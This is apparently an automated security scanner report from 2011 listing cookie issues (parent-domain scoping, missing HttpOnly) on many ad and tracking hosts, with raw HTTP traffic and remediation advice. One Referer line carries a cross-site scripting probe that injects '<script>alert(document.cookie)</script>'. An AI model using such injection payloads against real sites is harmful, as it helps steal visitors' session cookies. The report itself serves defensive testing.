HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_jXrh="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRYuvuiWxK5heZbiXhLgjogY3epOerrP4/9PQgCTNzSvrP9Y4WriuhDJ8LUH4CyhiygbkI6Qe46QL3ysOTq8CWCjajF58cLZR38/cuDQBah3RSAXQrcuwCKK48DLMBFdbO9047tQyRaTxgKde4Mm03TcBXyOmbzMtUOO6J1FvDTSjZWhE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxZvzsVdi8NiprYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3wbhguSrbE1R5AjsszxQ7b2phQztEEL62sdHARDtFbH3OJm/VPdOINnDb+86Nrzef85GLUTSOmQvDMUO4BgHEgBahj4nShXBrxvzGGSgFxKeOi/wnURRHhCsUk3w6bNETq9ndhTT/TyjyQQV6c1knNyzAR8F0SMmPc7F1XP1SWGwHv4lmVjL6tsMqn9hwdjG2Z2hXONeoPHhNgeyMXMKDvY80hwkmCgrYDzekHPadb5bUcrHvsM5o4WPU2TIAYM6hIuH6jvt4FcFbTkZBk9q7caxcxI2TJpwDYfDKhb2bpjeGdZoqJ64fCKH3HoxZHfHIW3ohUSVLFElW2dzNek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0uHXPvFFCY2Evk4YaLTmYjNE07RfYpxCTaGGg/BdkFC6HM8llsGAFcBnyoJmDj3YaTqrACMoAJTlW5TriVRhc0NWg84j7RXnaqskHltoSyiREwzu6qrMZhfYCTDcN8gjoa9P/CIhtjyJ4oyARPv25F9kJRGwyOgsOqdBmOnVb9IoyXr5WIWzf4q+vmTbO5TCBBuTR1zVApcQcU/o5DdbcpTo7+6xV1qaCy/a9Q9My4u85XsEQQaxzD/ydbuZZkmsuUqZJ7vRCvvf/OQpmY9l9LvHGNlEL1TRNTD4+MDArWjX2PQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 15 May 2011 13:19:34 GMT Content-Length: 541
function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track.fcgi?merchantid=3100817967&eventid=0&ifmode=1 HTTP/1.1 Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jstag HTTP/1.1 Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=iso-8859-1 Cache-Control: public, max-age=3600 P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Sun, 15 May 2011 15:01:49 UTC Content-Length: 1454 Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; version=1; path=/; domain=.openx.net; max-age=63072000;
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E95E85011A11-400001092013EAAF[CE]; Expires=Fri, 13 May 2016 13:18:53 GMT; Domain=.gelifesciences.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15?id=r61&ms=commercial&sc=presales.awareness&co=services&sco=all&msmdavalue=-1&wsid=r61&ezbuyExperience=channel&ezbuyPNList=-1&ezbEppId=-1&ezbStoreId=-1&ezbPartnerList=-1&rhi=rhi-&qt=-1 HTTP/1.1 Host: h41174.www4.hp.com Proxy-Connection: keep-alive Referer: http://www8.hp.com/us/en/services/it-services.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:22 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW803P0iYACJOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.hp.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2066 Content-Type: application/x-javascript Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly
function OAS_RICH(position) { if (position == 'Frame1') { document.write ('<!-- -->'); } if (position == 'Frame2') { document.write ('<!-- -->'); } if (position == 'Left1') { document.write ('<!-- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rs?id=d30b1d9b051449f4b23bae33eb84e507&t=marketing HTTP/1.1 Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.cisp.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=G5ba54a33PuS;Path=/;Domain=.providesupport.com Content-Length: 3445 Date: Sun, 15 May 2011 13:16:33 GMT Connection: close
var ps_chatcisp1_sid = "G5ba54a33PuS"; // safe-monitor@gecko.js
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) var rsi_now= new Date(); var rsi_csid= 'H05525';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/tre?ad_id=19801;evt=1;cat1=1;cat2=12939 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E92585010141-6000010B401B0D64[CE]; Expires=Fri, 13 May 2016 13:16:59 GMT; Domain=.hp.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_jix60njix60=[CS]v4|0-0|4DCFD2E6[CE]; Expires=Fri, 13 May 2016 13:19:34 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/mngimng/1/H.17/s61455768113955?AQB=1&ndh=1&t=15/4/2011%208%3A17%3A16%200%20300&g=http%3A//www.medianewsgroup.com/Pages/default.aspx&cc=USD&ch=Home&events=event1&c1=D%3Dg&c29=www.medianewsgroup.com%20/%20SiteCatalystCode_H_17.js&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: mngimng.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.medianewsgroup.com/Pages/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 15 May 2011 13:19:34 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_jix60njix60=[CS]v4|0-0|4DCFD2E6[CE]; Expires=Fri, 13 May 2016 13:19:34 GMT; Domain=.2o7.net; Path=/ Location: http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955?AQB=1&pccr=true&&ndh=1&t=15/4/2011%208%3A17%3A16%200%20300&g=http%3A//www.medianewsgroup.com/Pages/default.aspx&cc=USD&ch=Home&events=event1&c1=D%3Dg&c29=www.medianewsgroup.com%20/%20SiteCatalystCode_H_17.js&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.4.1 Expires: Sat, 14 May 2011 13:19:34 GMT Last-Modified: Mon, 16 May 2011 13:19:34 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www400 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=1888 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.new.onebox.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_1305465394383/rexdot.gif?l=30&id=0sfr2eMuwEBa_Z.w.aYwrJch.lzgKkcwiJl1SiBNseL.G7&fr=1&fv=Shockwave%20Flash%2010.3%20r181&tz=300&href=http%3A//www.turk.net/&ref=&screen=1920x1200&col=32 HTTP/1.1 Host: pro.hit.gemius.pl Proxy-Connection: keep-alive Referer: http://www.turk.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=xsKlvalg4lwfy8LPcIiVCPKkpSxp_RJng-zvuwC70piejuJEq_LImxDsetEai8Le1n88qWVlF6FRdkauRZlBdQ HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6354125628713.519? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r1/pixel/x373 HTTP/1.1 Host: rs.gwallet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?pixelID=13450&partnerID=91&clientID=2648&key=segment&returnType=js HTTP/1.1 Host: segment-pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=1888 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:30 GMT Set-Cookie: uid=7f79cc31-6414-41b9-8590-eaa56f2b9910;Expires=Mon, 14-May-2012 13:16:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: segments_p1="eJzjYuboygQAAdgBCQ==";Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 14-May-2012 13:16:30 GMT;Max-Age=31536000 Pragma: no-cache Content-Type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Content-Length: 343 Connection: close Server: Jetty(7.3.1.v20110307)
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E975851595AD-400001752000449F[CE]; Expires=Fri, 13 May 2016 13:19:39 GMT; Domain=.vehix.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/189 HTTP/1.1 Host: tags.mediaforge.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/plain Date: Sun, 15 May 2011 13:16:50 GMT P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" PRAGMA: no-cache Server: nginx/0.8.53 Set-Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==; expires=Mon, 14-May-12 13:16:50 GMT; domain=.mediaforge.com; path=/ Content-Length: 1442 Connection: keep-alive
_mf_tag = { "init": function() { var id = 'mf_div'; var div = this.create_element(document, ['div', 'id', id]); if(div) { div.style.displa ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tp?act=1&cid=559woa3610&tz=5&ref=&page=http%3A%2F%2Fwww.teleflora.com%2F&uuid=540B8811-AD16-418C-B36C-877EDE932F36&rnd=39396226 HTTP/1.1 Host: tracker.marinsm.com Proxy-Connection: keep-alive Referer: http://www.teleflora.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0 P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS" Pragma: no-cache Cache-Control: private, no-cache Content-Type: image/gif Content-Length: 35 Date: Sun, 15 May 2011 13:18:45 GMT Connection: close Set-Cookie: _msuuid=540B8811-AD16-418C-B36C-877EDE932F36; Domain=marinsm.com; Expires=Mon, 14-May-2012 13:18:45 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bigcommerce-vs-oscommerce.php?ga_campaign=(roi)+competitors&ga_adgroup=oscommerce&ga_keyword=osCommerce&gclid=CMjIyryO6qgCFc065Qod0hgzvA HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.eshopfitters.co.uk Proxy-Connection: keep-alive Referer: http://www.oscommerce.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.internetnatrgovina.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43692 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mmabasket.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43678 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.sapiens.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns="http://www.w3.org/1999/xhtml"> <!-- BC ...[SNIP]...
11. Cookie without HttpOnly flag setpreviousnext There are 243 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
(new Image(0,0)).src='http://ad.doubleclick.net/activity;src=1897549;dcnet=4591;boom=18245;sz=1x1;ord='; (new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=562523&id=390905'; (new Imag ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=8usl3dbjfoecp35qrbtrppbt37; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?vid=139237823&eid=49&tid=null&tag=landing&ref=http%3A//www.teleflora.com/ HTTP/1.1 Host: cts-log.channelintelligence.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:48 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: serverstamp=4C33DB3C-A4E9-E1AE-6596-9AA13B00657D;Domain=.channelintelligence.com;Expires=Wed, 12-May-21 13:18:48 GMT Set-Cookie: sessionstamp=E5D27090-A511-99DB-5353-545157305174;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 14:18:48 GMT Cache-Control: private,no-store Content-Length: 42 pragma: no-cache content-type: image/gif X-Powered-By: Mirror Image Internet P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Via: 1.1 dfw061005 (MII-APC/1.6)
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7ihan2igv8k9oo4954bucqks84; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /channels/freezone-partners?application=32 HTTP/1.1 Host: freezone.iinet.net.au Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
